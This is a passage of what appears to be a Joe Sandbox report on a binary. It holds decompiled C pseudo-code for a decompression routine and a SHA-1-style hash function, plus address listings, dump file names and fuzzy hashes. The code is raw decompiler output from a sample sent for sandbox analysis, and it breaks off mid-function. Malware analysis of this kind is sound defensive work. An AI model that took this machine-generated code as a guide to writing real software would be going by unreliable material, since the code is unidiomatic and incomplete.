                															_t569[1] = _t714;
                															_t570 = 0x10;
                															 *(_t725 + 0x1c) = _t714;
                															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
                															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
                															asm("sbb eax, eax");
                															_t453 = _t452 & _t573;
                															__eflags = _t453;
                															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
                															L51:
                															_t654 = _t454 & 0x0000ffff;
                															__eflags = _t654 - 4;
                															if(_t654 >= 4) {
                																_t457 = (_t654 >> 1) - 1;
                																 *(_t725 + 0x30) = _t457;
                																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
                																 *(_t725 + 0x34) = _t575;
                																_t715 = _t575;
                																 *(_t725 + 0x28) = _t715;
                																__eflags = _t457;
                																if(_t457 == 0) {
                																	L70:
                																	__eflags = _t715 - 0x100;
                																	if(_t715 > 0x100) {
                																		_t681 = _t681 + 1;
                																		__eflags = _t715 - 0x2000;
                																		if(_t715 > 0x2000) {
                																			_t681 = _t681 + 1;
                																			__eflags = _t715 - 0x40000;
                																			if(_t715 > 0x40000) {
                																				_t681 = _t681 + 1;
                																				__eflags = _t681;
                																			}
                																		}
                																	}
                																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
                																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
                																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
                																	 *(_t686 + 0x60) = _t715;
                																	_t658 =  *(_t686 + 0x7c);
                																	_t577 = _t658 - _t715;
                																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                																	 *(_t686 + 0x74) = _t681;
                																	 *(_t725 + 0x34) = _t577;
                																	__eflags = _t577 - _t462;
                																	if(_t577 >= _t462) {
                																		goto L92;
                																	} else {
                																		__eflags = _t658 - _t462;
                																		if(_t658 >= _t462) {
                																			goto L92;
                																		}
                																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
                																		_t710 = _t466 + _t658;
                																		_t521 = _t466 + _t577;
                																		_t661 = 8;
                																		 *(_t686 + 0x7c) = _t658 + _t681;
                																		__eflags = _t681 - _t661;
                																		if(_t681 < _t661) {
                																			goto L84;
                																		}
                																		__eflags =  *(_t725 + 0x28) - _t681;
                																		if( *(_t725 + 0x28) >= _t681) {
                																			_t469 = _t681 >> 3;
                																			__eflags = _t469;
                																			 *(_t725 + 0x34) = _t469;
                																			_t689 = _t469;
                																			do {
                																				E003F0320(_t710, _t521, _t661);
                																				_t725 = _t725 + 0xc;
                																				_t661 = 8;
                																				_t521 = _t521 + _t661;
                																				_t710 = _t710 + _t661;
                																				_t681 = _t681 - _t661;
                																				_t689 = _t689 - 1;
                																				__eflags = _t689;
                																			} while (_t689 != 0);
                																			goto L83;
                																		}
                																		_t580 = _t681 >> 3;
                																		__eflags = _t580;
                																		do {
                																			_t681 = _t681 - _t661;
                																			 *_t710 =  *_t521;
                																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                																			_t478 =  *((intOrPtr*)(_t521 + 7));
                																			_t521 = _t521 + _t661;
                																			 *((char*)(_t710 + 7)) = _t478;
                																			_t710 = _t710 + _t661;
                																			_t580 = _t580 - 1;
                																			__eflags = _t580;
                																		} while (_t580 != 0);
                																		goto L84;
                																	}
                																}
                																__eflags = _t457 - 4;
                																if(__eflags < 0) {
                																	_t479 = E003E8934( *(_t725 + 0x10));
                																	_t662 =  *(_t725 + 0x10);
                																	_t582 = 0x20;
                																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
                																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
                																	_t586 = _t585 & 0x00000007;
                																	__eflags = _t586;
                																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
                																	_t662[1] = _t586;
                																	L69:
                																	 *(_t725 + 0x28) = _t715;
                																	goto L70;
                																}
                																if(__eflags <= 0) {
                																	_t483 =  *(_t725 + 0x10);
                																} else {
                																	_t499 = E003E8934( *(_t725 + 0x10));
                																	_t500 =  *(_t725 + 0x30);
                																	_t604 = 0x24;
                																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
                																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
                																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
                																	_t483 =  *(_t725 + 0x10);
                																	_t608 = _t607 & 0x00000007;
                																	 *(_t725 + 0x20) = _t669;
                																	 *(_t725 + 0x1c) = _t608;
                																	 *_t483 = _t669;
                																	_t483[1] = _t608;
                																}
                																_t484 = E003DA89D(_t483);
                																_t485 =  *(_t520 + 0x1e8c);
                																_t664 = _t484 & 0x0000fffe;
                																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
                																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
                																	_t588 = 0xf;
                																	_t486 = _t485 + 1;
                																	 *(_t725 + 0x28) = _t588;
                																	__eflags = _t486 - _t588;
                																	if(_t486 >= _t588) {
                																		L66:
                																		_t690 =  *(_t725 + 0x10);
                																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
                																		 *_t690 =  *_t690 + (_t590 >> 3);
                																		_t690[1] = _t590 & 0x00000007;
                																		_t491 =  *(_t725 + 0x2c);
                																		_t592 = 0x10;
                																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
                																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
                																		asm("sbb eax, eax");
                																		_t492 = _t491 & _t595;
                																		__eflags = _t492;
                																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
                																		goto L67;
                																	}
                																	_t597 = _t520 + (_t486 + 0x783) * 4;
                																	while(1) {
                																		__eflags = _t664 -  *_t597;
                																		if(_t664 <  *_t597) {
                																			break;
                																		}
                																		_t486 = _t486 + 1;
                																		_t597 = _t597 + 4;
                																		__eflags = _t486 - 0xf;
                																		if(_t486 < 0xf) {
                																			continue;
                																		}
                																		goto L66;
                																	}
                																	 *(_t725 + 0x28) = _t486;
                																	goto L66;
                																} else {
                																	_t691 =  *(_t725 + 0x10);
                																	_t598 = 0x10;
                																	_t667 = _t664 >> _t598 - _t485;
                																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
                																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
                																	_t691[1] = _t601 & 0x00000007;
                																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
                																	L67:
                																	_t686 =  *(_t725 + 0x24);
                																	_t715 = _t715 + (_t493 & 0x0000ffff);
                																	goto L69;
                																}
                															}
                															_t715 = _t654 + 1;
                															goto L69;
                														}
                														_t610 = _t520 + (_t448 + 0x3c8) * 4;
                														while(1) {
                															__eflags = _t651 -  *_t610;
                															if(_t651 <  *_t610) {
                																break;
                															}
                															_t448 = _t448 + 1;
                															_t610 = _t610 + 4;
                															__eflags = _t448 - _t711;
                															if(_t448 < _t711) {
                																continue;
                															}
                															goto L50;
                														}
                														 *(_t725 + 0x28) = _t448;
                														goto L50;
                													}
                													_t611 = 0x10;
                													_t670 = _t651 >> _t611 - _t447;
                													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
                													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
                													_t506 =  *(_t725 + 0x10);
                													_t615 = _t614 & 0x00000007;
                													 *(_t725 + 0x20) = _t723;
                													 *(_t725 + 0x1c) = _t615;
                													 *_t506 = _t723;
                													_t506[1] = _t615;
                													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
                													goto L51;
                												}
                												_t507 = E003DA89D( *(_t725 + 0x10));
                												_t724 = _t697 +  *(_t725 + 0x34);
                												_t617 = 0x10;
                												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
                												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
                												_t445 =  *(_t725 + 0x10);
                												_t697 = _t724 & 0x00000007;
                												 *(_t725 + 0x1c) = _t620;
                												 *_t445 = _t620;
                												_t445[1] = _t697;
                												goto L40;
                											}
                											 *(_t725 + 0x1c) = _t375;
                											_t681 = _t682 + 2;
                											__eflags = _t681;
                											goto L39;
                										}
                										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
                										_t72 = _t686 + 0x7c;
                										 *_t72 =  *(_t686 + 0x7c) + 1;
                										__eflags =  *_t72;
                										goto L35;
                									}
                									_t623 = _t520 + (_t369 + 0xd) * 4;
                									while(1) {
                										__eflags = _t630 -  *_t623;
                										if(_t630 <  *_t623) {
                											break;
                										}
                										_t369 = _t369 + 1;
                										_t623 = _t623 + 4;
                										__eflags = _t369 - 0xf;
                										if(_t369 < 0xf) {
                											continue;
                										}
                										_t528 =  *(_t725 + 0x28);
                										goto L32;
                									}
                									_t528 = _t369;
                									 *(_t725 + 0x28) = _t369;
                									goto L32;
                								}
                								_t624 = 0x10;
                								_t671 = _t630 >> _t624 - _t368;
                								_t524 = _t674;
                								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
                								 *_t524 =  *_t524 + (_t707 >> 3);
                								_t697 = _t707 & 0x00000007;
                								_t375 =  *_t524;
                								_t524[1] = _t697;
                								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
                								 *(_t725 + 0x1c) = _t375;
                								goto L33;
                							}
                							__eflags = _t526 - _t628;
                							if(_t526 == _t628) {
                								goto L24;
                							}
                							E003E5202(_t686);
                							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
                							if(__eflags > 0) {
                								L6:
                								return 0;
                							}
                							if(__eflags < 0) {
                								goto L24;
                							}
                							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
                							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
                								goto L6;
                							}
                							goto L24;
                						}
                					}
                					L5:
                					 *((char*)(_t520 + 0x4ad0)) = 1;
                					goto L6;
                				}
                				 *((char*)(_t520 + 0x2c)) = 1;
                				_push(_t520 + 0x30);
                				_push(_t672);
                				_push(_t692);
                				if(E003E43BF(__ecx) == 0) {
                					goto L5;
                				} else {
                					goto L4;
                				}
                			}
                0x003e7e76
                0x00000000
                0x003e7e7b
                0x003e7dbc
                0x003e7dbf
                0x003e7dc3
                0x003e7dc6
                0x00000000
                0x00000000
                0x003e7dcf
                0x003e7dd2
                0x003e7dd6
                0x003e7dd9
                0x00000000
                0x00000000
                0x003e7de2
                0x003e7de5
                0x003e7de9
                0x003e7dec
                0x00000000
                0x00000000
                0x003e7df5
                0x003e7df8
                0x003e7dfc
                0x003e7dff
                0x00000000
                0x00000000
                0x003e7e08
                0x003e7e0b
                0x003e7e0f
                0x003e7e12
                0x00000000
                0x00000000
                0x003e7e1b
                0x003e7e1e
                0x003e7e22
                0x003e7e25
                0x00000000
                0x00000000
                0x003e7e2e
                0x003e7e32
                0x00000000
                0x003e7e32
                0x003e812d
                0x003e812f
                0x003e8177
                0x003e8177
                0x003e817a
                0x003e817e
                0x003e8180
                0x003e8183
                0x003e8188
                0x003e818d
                0x003e818e
                0x003e8190
                0x003e8192
                0x003e8194
                0x003e8194
                0x003e8194
                0x00000000
                0x003e8199
                0x003e8133
                0x003e8133
                0x003e8136
                0x003e8138
                0x003e813a
                0x003e8140
                0x003e8146
                0x003e814c
                0x003e8152
                0x003e8158
                0x003e815e
                0x003e8161
                0x003e8164
                0x003e8166
                0x003e8169
                0x003e816b
                0x003e816b
                0x003e816b
                0x00000000
                0x003e8170
                0x003e8102
                0x003e803b
                0x003e803e
                0x003e803e
                0x003e8040
                0x00000000
                0x00000000
                0x003e8042
                0x003e8043
                0x003e8046
                0x003e8049
                0x00000000
                0x00000000
                0x00000000
                0x003e804b
                0x003e804d
                0x00000000
                0x003e804d
                0x003e7ffa
                0x003e7ffd
                0x003e8007
                0x003e800f
                0x003e8012
                0x003e8018
                0x003e801c
                0x003e801f
                0x003e8027
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e7fc6
                0x003e7fc6
                0x003e7fc9
                0x003e7fcb
                0x003e7fce
                0x003e7fce
                0x003e7fce
                0x00000000
                0x003e7fc6
                0x003e7ebe
                0x003e7ec1
                0x003e7ec5
                0x003e7ec9
                0x003e7ec9
                0x003e7e88
                0x003e7e8c
                0x003e7e91
                0x003e7e93
                0x00000000
                0x00000000
                0x003e7ea0
                0x003e7ea5
                0x003e7ea7
                0x00000000
                0x00000000
                0x00000000
                0x003e7ead
                0x003e79f4
                0x003e79fa
                0x003e79fd
                0x003e7a74
                0x003e7a77
                0x003e7a7d
                0x003e7a80
                0x003e7a82
                0x003e7a06
                0x003e7a06
                0x003e7a0a
                0x003e7a0c
                0x003e7a13
                0x003e7a19
                0x003e7a1f
                0x003e7a26
                0x003e7abe
                0x003e7abf
                0x003e7ac0
                0x003e7ac4
                0x003e7ac6
                0x003e7ae3
                0x003e7ae3
                0x003e7aec
                0x003e7af2
                0x003e7af8
                0x003e7afc
                0x003e7b00
                0x003e7b04
                0x003e7b07
                0x003e7b0a
                0x003e7b1e
                0x003e7b20
                0x003e7b26
                0x003e7b28
                0x003e7b28
                0x003e7b2a
                0x003e7b32
                0x003e7b32
                0x003e7b35
                0x003e7b38
                0x003e7b4c
                0x003e7b4f
                0x003e7b55
                0x003e7b58
                0x003e7b5c
                0x003e7b5e
                0x003e7b62
                0x003e7b64
                0x003e7cc9
                0x003e7cc9
                0x003e7ccf
                0x003e7cd1
                0x003e7cd2
                0x003e7cd8
                0x003e7cda
                0x003e7cdb
                0x003e7ce1
                0x003e7ce3
                0x003e7ce3
                0x003e7ce3
                0x003e7ce1
                0x003e7cd8
                0x003e7ce7
                0x003e7ced
                0x003e7cf3
                0x003e7cf6
                0x003e7cf9
                0x003e7d04
                0x003e7d06
                0x003e7d0b
                0x003e7d0e
                0x003e7d12
                0x003e7d14
                0x00000000
                0x003e7d1a
                0x003e7d1a
                0x003e7d1c
                0x00000000
                0x00000000
                0x003e7d22
                0x003e7d2a
                0x003e7d2d
                0x003e7d33
                0x003e7d34
                0x003e7d37
                0x003e7d39
                0x00000000
                0x00000000
                0x003e7d3b
                0x003e7d3f
                0x003e7d84
                0x003e7d84
                0x003e7d87
                0x003e7d8b
                0x003e7d8d
                0x003e7d90
                0x003e7d95
                0x003e7d9a
                0x003e7d9b
                0x003e7d9d
                0x003e7d9f
                0x003e7da1
                0x003e7da1
                0x003e7da1
                0x00000000
                0x003e7d8d
                0x003e7d43
                0x003e7d43
                0x003e7d46
                0x003e7d48
                0x003e7d4a
                0x003e7d50
                0x003e7d56
                0x003e7d5c
                0x003e7d62
                0x003e7d68
                0x003e7d6e
                0x003e7d71
                0x003e7d74
                0x003e7d76
                0x003e7d79
                0x003e7d7b
                0x003e7d7b
                0x003e7d7b
                0x00000000
                0x003e7d80
                0x003e7d14
                0x003e7b6a
                0x003e7b6d
                0x003e7c94
                0x003e7c99
                0x003e7ca1
                0x003e7cac
                0x003e7cb0
                0x003e7cbd
                0x003e7cbd
                0x003e7cc0
                0x003e7cc2
                0x003e7cc5
                0x003e7cc5
                0x00000000
                0x003e7cc5
                0x003e7b73
                0x003e7bbc
                0x003e7b75
                0x003e7b79
                0x003e7b84
                0x003e7b8a
                0x003e7b96
                0x003e7b9b
                0x003e7ba4
                0x003e7ba6
                0x003e7baa
                0x003e7bad
                0x003e7bb1
                0x003e7bb5
                0x003e7bb7
                0x003e7bb7
                0x003e7bc2
                0x003e7bc9
                0x003e7bcf
                0x003e7bd5
                0x003e7bdc
                0x003e7c14
                0x003e7c15
                0x003e7c16
                0x003e7c1a
                0x003e7c1c
                0x003e7c3a
                0x003e7c3e
                0x003e7c47
                0x003e7c53
                0x003e7c57
                0x003e7c5a
                0x003e7c5e
                0x003e7c71
                0x003e7c73
                0x003e7c79
                0x003e7c7b
                0x003e7c7b
                0x003e7c7d
                0x00000000
                0x003e7c7d
                0x003e7c24
                0x003e7c27
                0x003e7c27
                0x003e7c29
                0x00000000
                0x00000000
                0x003e7c2b
                0x003e7c2c
                0x003e7c2f
                0x003e7c32
                0x00000000
                0x00000000
                0x00000000
                0x003e7c34
                0x003e7c36
                0x00000000
                0x003e7bde
                0x003e7bde
                0x003e7be4
                0x003e7be7
                0x003e7bf1
                0x003e7c01
                0x003e7c05
                0x003e7c08
                0x003e7c85
                0x003e7c85
                0x003e7c8c
                0x00000000
                0x003e7c8c
                0x003e7bdc
                0x003e7b3a
                0x00000000
                0x003e7b3a
                0x003e7ace
                0x003e7ad1
                0x003e7ad1
                0x003e7ad3
                0x00000000
                0x00000000
                0x003e7ad5
                0x003e7ad6
                0x003e7ad9
                0x003e7adb
                0x00000000
                0x00000000
                0x00000000
                0x003e7add
                0x003e7adf
                0x00000000
                0x003e7adf
                0x003e7a2e
                0x003e7a31
                0x003e7a3b
                0x003e7a46
                0x003e7a48
                0x003e7a4c
                0x003e7a4f
                0x003e7a53
                0x003e7a57
                0x003e7a59
                0x003e7a5c
                0x00000000
                0x003e7a5c
                0x003e7a88
                0x003e7a8d
                0x003e7a93
                0x003e7a9e
                0x003e7aa5
                0x003e7aa7
                0x003e7aab
                0x003e7aae
                0x003e7ab2
                0x003e7ab4
                0x00000000
                0x003e7ab4
                0x003e79ff
                0x003e7a03
                0x003e7a03
                0x00000000
                0x003e7a03
                0x003e79d5
                0x003e79d8
                0x003e79d8
                0x003e79d8
                0x00000000
                0x003e79d8
                0x003e7960
                0x003e7963
                0x003e7963
                0x003e7965
                0x00000000
                0x00000000
                0x003e7967
                0x003e7968
                0x003e796b
                0x003e796e
                0x00000000
                0x00000000
                0x003e7970
                0x00000000
                0x003e7970
                0x003e7976
                0x003e7978
                0x00000000
                0x003e7978
                0x003e7922
                0x003e7925
                0x003e7927
                0x003e7931
                0x003e7939
                0x003e793b
                0x003e793e
                0x003e7940
                0x003e7943
                0x003e794b
                0x00000000
                0x003e794b
                0x003e78d0
                0x003e78d2
                0x00000000
                0x00000000
                0x003e78d6
                0x003e78e1
                0x003e78e7
                0x003e783c
                0x00000000
                0x003e783c
                0x003e78ed
                0x00000000
                0x00000000
                0x003e78f5
                0x003e78fb
                0x00000000
                0x00000000
                0x00000000
                0x003e78fb
                0x003e7874
                0x003e7835
                0x003e7835
                0x00000000
                0x003e7835
                0x003e7813
                0x003e7817
                0x003e7818
                0x003e7819
                0x003e7821
                0x00000000
                0x003e7823
                0x00000000
                0x003e7823

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                • Instruction ID: d3d79744da63715b9d16487c6ed6b747f9c9adf715dd46293310c55a06874e7f
                • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                • Instruction Fuzzy Hash: 4962F97160C3D58FCB16CF29C8805B9BBE1BF95304F198A6DE89A8B386D730E945CB15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E003DF461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
                				signed int _v4;
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int* _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _t434;
                				intOrPtr _t436;
                				intOrPtr _t441;
                				void* _t446;
                				intOrPtr _t448;
                				signed int _t451;
                				void* _t453;
                				signed int _t459;
                				signed int _t465;
                				signed int _t471;
                				signed int _t478;
                				signed int _t481;
                				signed int _t488;
                				signed int _t511;
                				signed int _t518;
                				signed int _t525;
                				signed int _t545;
                				signed int _t554;
                				signed int _t563;
                				signed int* _t591;
                				signed int _t592;
                				signed int _t596;
                				signed int _t599;
                				signed int _t600;
                				signed int* _t601;
                				signed int _t602;
                				signed int _t604;
                				signed int _t606;
                				signed int _t607;
                				signed int* _t608;
                				signed int _t609;
                				signed int* _t675;
                				signed int* _t746;
                				signed int _t757;
                				signed int _t774;
                				signed int _t778;
                				signed int _t782;
                				signed int _t783;
                				signed int _t787;
                				signed int _t788;
                				signed int _t792;
                				signed int _t797;
                				signed int _t801;
                				signed int _t805;
                				signed int _t807;
                				signed int _t810;
                				signed int* _t812;
                				signed int _t815;
                				signed int _t816;
                				signed int _t817;
                				signed int _t821;
                				signed int _t822;
                				signed int _t826;
                				signed int _t831;
                				signed int _t835;
                				signed int _t839;
                				signed int* _t840;
                				signed int _t842;
                				signed int _t843;
                				signed int _t844;
                				signed int _t846;
                				signed int _t847;
                				signed int _t849;
                				signed int* _t850;
                				signed int _t853;
                				signed int _t857;
                				signed int _t858;
                				signed int* _t862;
                				signed int _t863;
                				signed int _t865;
                				signed int _t866;
                				signed int _t870;
                				signed int _t871;
                				signed int _t875;
                				signed int _t879;
                				signed int _t883;
                				signed int _t887;
                				signed int _t888;
                				signed int* _t889;
                				signed int _t890;
                				signed int _t892;
                				signed int _t893;
                				signed int _t894;
                				signed int _t896;
                				signed int _t897;
                				signed int _t899;
                				signed int _t900;
                				signed int _t902;
                				signed int _t903;
                				signed int* _t904;
                				signed int _t905;
                				signed int _t907;
                				signed int _t908;
                				signed int _t910;
                				signed int _t911;
                
                				_t912 =  &_v40;
                				if(_a16 == 0) {
                					_t840 = _a8;
                					_v20 = _t840;
                					E003F0320(_t840, _a12, 0x40);
                					_t912 =  &(( &_v40)[3]);
                				} else {
                					_t840 = _a12;
                					_v20 = _t840;
                				}
                				_t850 = _a4;
                				_t592 = _t850[1];
                				_t894 =  *_t850;
                				_v28 = _t850[2];
                				_v24 = _t850[3];
                				_v32 = _t592;
                				_v36 = 0;
                				_t434 = E003F68E4( *_t840);
                				asm("rol edx, 0x5");
                				 *_t840 = _t434;
                				_t435 = _t840;
                				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
                				_v16 = _t840;
                				_t853 = _v32;
                				asm("ror esi, 0x2");
                				_v32 =  &(_t840[3]);
                				do {
                					_t436 = E003F68E4(_t435[1]);
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_v16 + 4)) = _t436;
                					asm("ror ebp, 0x2");
                					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
                					_t441 = E003F68E4( *((intOrPtr*)(_v32 - 4)));
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_v32 - 4)) = _t441;
                					asm("ror ebx, 0x2");
                					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
                					_t446 = E003F68E4( *_v32);
                					asm("rol edx, 0x5");
                					 *_v32 = _t446;
                					asm("ror dword [esp+0x2c], 0x2");
                					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
                					_t448 = E003F68E4( *((intOrPtr*)(_v32 + 4)));
                					_v32 = _v32 + 0x14;
                					asm("rol edx, 0x5");
                					 *((intOrPtr*)(_v32 + 4)) = _t448;
                					_t451 = _v36 + 5;
                					asm("ror dword [esp+0x2c], 0x2");
                					_v36 = _t451;
                					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
                					_v16 =  &(_t840[_t451]);
                					_t453 = E003F68E4(_t840[_t451]);
                					_t912 =  &(_t912[5]);
                					asm("rol edx, 0x5");
                					 *_v16 = _t453;
                					_t435 = _v16;
                					asm("ror esi, 0x2");
                					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
                				} while (_v36 != 0xf);
                				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
                				_v32 = _t853;
                				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
                				asm("rol ecx, 0x5");
                				asm("rol esi, 1");
                				asm("rol edx, 1");
                				asm("ror ebp, 0x2");
                				_t840[1] = _t774;
                				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
                				 *_t840 = _t857;
                				_v40 = _t459;
                				asm("rol ecx, 0x5");
                				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
                				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
                				_v36 = _t465;
                				asm("ror ebx, 0x2");
                				asm("rol edx, 1");
                				asm("rol ecx, 0x5");
                				asm("ror dword [esp+0x10], 0x2");
                				_t840[2] = _t778;
                				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
                				_v32 = _t471;
                				asm("rol ecx, 0x5");
                				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
                				_t858 = _v40;
                				asm("rol edx, 1");
                				_t840[3] = _t782;
                				_v24 = _t596;
                				asm("ror dword [esp+0x18], 0x2");
                				_t783 = 0x11;
                				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
                				_v16 = _t783;
                				do {
                					_t96 = _t783 + 5; // 0x16
                					_t478 = _t96;
                					_t97 = _t783 - 5; // 0xc
                					_v8 = _t478;
                					_t99 = _t783 + 3; // 0x14
                					_t896 = _t99 & 0x0000000f;
                					_v12 = _t896;
                					_t599 = _t478 & 0x0000000f;
                					asm("rol ecx, 0x5");
                					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
                					_t481 = _v16;
                					asm("rol edx, 1");
                					_t840[_t896] = _t787;
                					_t897 = _v32;
                					asm("ror ebp, 0x2");
                					_v32 = _t897;
                					_t862 = _v20;
                					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
                					_t788 = 0xf;
                					_t899 = _t481 + 0x00000004 & _t788;
                					_t842 = _t481 + 0x00000006 & _t788;
                					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
                					asm("rol edx, 1");
                					 *(_t862 + _t899 * 4) = _t792;
                					_t863 = _v28;
                					asm("rol ecx, 0x5");
                					asm("ror esi, 0x2");
                					_v28 = _t863;
                					_t488 = _v16;
                					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
                					_t865 = _t488 + 0x00000007 & 0x0000000f;
                					_t675 = _v20;
                					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
                					asm("rol edx, 1");
                					 *(_t675 + _t599 * 4) = _t797;
                					_t600 = _v24;
                					asm("rol ecx, 0x5");
                					asm("ror ebx, 0x2");
                					_v24 = _t600;
                					_t601 = _v20;
                					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
                					asm("rol ecx, 0x5");
                					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
                					asm("rol edx, 1");
                					 *(_t601 + _t842 * 4) = _t801;
                					_t602 = _v24;
                					_t843 = _v40;
                					asm("ror edi, 0x2");
                					_v40 = _t843;
                					_t840 = _v20;
                					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
                					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
                					_t900 = _v36;
